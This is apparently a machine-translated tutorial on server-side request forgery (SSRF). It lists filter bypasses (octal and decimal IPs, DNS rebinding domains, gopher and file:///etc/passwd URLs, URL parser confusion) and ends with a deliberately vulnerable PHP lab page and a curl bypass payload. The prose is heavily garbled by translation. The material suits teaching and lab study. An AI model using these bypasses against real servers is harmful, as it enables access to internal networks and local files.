SSRF (Server-Side Request Forgery, server request forgery): a structure formed by an attacker a flaw that initiated the request by the server.
SSRF goal is to attack the internal system from the external network can not access
Causes of vulnerability server provides the ability to get data from other servers and no application for filtering and restrictions on the destination address.
0x01 SSRF hazards
An attacker could exploit SSRF bypass the firewall, internal network contacts
An attacker could exploit to attack the main SSRF realize there are five:
banner information can be external network, server resides within the network, the local port scan, get some services
Attack the internal network or locally run applications (such as overflow)
Fingerprinting internal network WEB application, by accessing the default file
web application attacks inside and outside the network, primarily using GET parameters can be achieved attacks (such as Struts2, sqli, etc.)
Read local files using the file protocol, etc.
0x02 SSRF appearance scene
Foreign network where it can initiate a request, it is possible loopholes SSRF
Request resources from a remote server (Upload from URL, Import & Export RSS Feed)
Database built-in functionality (Oracle, MongoDB, MSSQL, Postgres, CouchDB)
Webmail mailbox to receive other e-mail (POP3, IMAP, SMTP)
Document processing, encoding processing, attribute information processing (ffmpeg, ImageMagic, DOCX, PDF, XML)
0x03 common defense and Workaround
First, check whether the IP network IP
Many developers believe that as long as the check request url is not within the host network IP, you can defense SSRF.
Typically using regular IP filtering the following five segments:
192.168.0.0/16 10.0.0.0/8 172.16.0.0/12 127.0.0.0/8 0.0.0.0/8 # under Linux, 127.0.0.1 0.0.0.0 and point to the local
This method can often bypass the defense with the IP address of the base conversion
Octal use IP addresses to bypass 0177.0.0.1
Use decimal IP addresses to bypass 2130706433
You can see the actual request is 127.0.0.1, but they are not a match on regular expressions.
Two, Host access and bypass the DNS
Check that acquired Host IP is a network of defense SSRF
The method of this defense DNS resolution may be bypassed
Host may be IP, it could be a domain name.
If the Host or Domain name, we are not a direct comparison, as long as it resolves to the internal network IP, you can bypass.
Online there is a magical domain http://xip.io (walled), www.127.0.0.1.xip.io , automatically resolves to 127.0.0.1
Third, through various protocols
GOPHER: We constructed by GOPHER URL parameter in a Post or Get request, so that the inner attack network applications, such as Redis service.
File: access files on the local computer with File protocols, such as file: /// etc / password.
Fourth, the use URL parser abuse
In some cases, URL access back-end program might be resolved, to parse out the host address filtering.
This may occur when parsing a URL parameter was incorrectly can bypass filter
When the rear end of the program by an incorrect regular expression, the content of the above-mentioned URL parsing
Considers host access URL is www.baidu.com , in fact request that content on 127.0.0.1
0x04 experiment URL parser abuse
Build experimental environment
There is a defense of SSRF safe_code on GitHub: https://github.com/chengable/safe_code/blob/master/ssrf_check.php
Wood has a remote machine, set up a local test it
Save the following code is modified index.php
<?php
highlight_file(__FILE__);
function check_inner_ip($url)
{
$match_result=preg_match('/^(http|https|gopher|dict)?:\/\/.*(\/)?.*$/',$url);
if (!$match_result)
{
die('url fomat error');
}
try
{
$url_parse=parse_url($url);
}
catch(Exception $e)
{
die('url fomat error');
return false;
}
$hostname=$url_parse['host'];
$ip=gethostbyname($hostname);
$int_ip=ip2long($ip);
return ip2long('127.0.0.0')>>24 == $int_ip>>24 || ip2long('10.0.0.0')>>24 == $int_ip>>24 || ip2long('172.16.0.0')>>20 == $int_ip>>20 || ip2long('192.168.0.0')>>16 == $int_ip>>16;
}
function safe_request_url($url)
{
if (check_inner_ip($url))
{
echo $url.' is inner ip';
}
else
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);
$output = curl_exec($ch);
$result_info = curl_getinfo($ch);
if ($result_info['redirect_url'])
{
safe_request_url($result_info['redirect_url']);
}
curl_close($ch);
var_dump($output);
}
}
$url = $_POST['url'];
if(!empty($url)){
safe_request_url($url);
}
?>
新建一个flag.php,写一串字符串当作flag
Data from the user program will first use safe_request_url function to judge the legality URL.
In safe_request_url function, a function to determine check_inner_ip requested by the user whether the internal IP address IP
If the internal IP, reject the request; otherwise curl request, and outputs request result.
The difference between using URL parser, refer Orange master of PPT
Construction payload:
curl -d "url=http://[email protected]:[email protected]/flag.php" "http://192.168.43.157"
